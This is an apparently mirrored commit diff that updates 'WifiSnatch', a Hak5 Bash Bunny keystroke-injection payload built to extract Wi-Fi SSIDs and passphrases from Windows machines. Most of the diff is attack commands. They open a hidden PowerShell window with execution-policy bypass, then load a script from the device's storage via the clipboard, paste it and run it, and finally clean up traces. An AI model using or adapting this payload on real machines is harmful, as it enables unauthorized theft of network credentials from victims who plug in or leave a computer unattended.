mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Updated WifiSnatch
Fixed multiple mistakes
This commit is contained in:
@@ -3,7 +3,7 @@
|
|||||||
# Title: WifiSnatch
|
# Title: WifiSnatch
|
||||||
# Description: Extract wifi information, such as passphrases & SSIDs
|
# Description: Extract wifi information, such as passphrases & SSIDs
|
||||||
# Author: 0iphor13
|
# Author: 0iphor13
|
||||||
# Version: 1.0
|
# Version: 1.1
|
||||||
# Category: Exfiltration
|
# Category: Exfiltration
|
||||||
# Attackmodes: HID, Storage
|
# Attackmodes: HID, Storage
|
||||||
|
|
||||||
@@ -20,18 +20,19 @@ ATTACKMODE HID STORAGE
|
|||||||
|
|
||||||
LED STAGE1
|
LED STAGE1
|
||||||
|
|
||||||
DELAY 5000
|
Q DELAY 1500
|
||||||
RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
|
RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
|
||||||
DELAY 5000
|
Q DELAY 500
|
||||||
|
Q ENTER
|
||||||
|
|
||||||
Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\exfil.txt'))"
|
Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\exfil.txt'))"
|
||||||
DELAY 10000
|
Q DELAY 2000
|
||||||
Q ENTER
|
Q ENTER
|
||||||
DELAY 10000
|
Q DELAY 1000
|
||||||
Q CONTROL v
|
Q CONTROL v
|
||||||
DELAY 10000
|
Q DELAY 1000
|
||||||
Q ENTER
|
Q ENTER
|
||||||
DELAY 1000
|
Q DELAY 1000
|
||||||
|
|
||||||
LED STAGE2
|
LED STAGE2
|
||||||
|
|
||||||
@@ -44,12 +45,12 @@ LED CLEANUP
|
|||||||
|
|
||||||
rm /root/udisk/DONE
|
rm /root/udisk/DONE
|
||||||
|
|
||||||
DELAY 100
|
Q DELAY 100
|
||||||
|
|
||||||
sync
|
sync
|
||||||
|
|
||||||
DELAY 100
|
Q DELAY 100
|
||||||
|
|
||||||
LED FINISH
|
LED FINISH
|
||||||
|
|
||||||
#SAVE TO EJECT
|
#SAVE TO EJECT
|
||||||
|
|||||||
Reference in New Issue
Block a user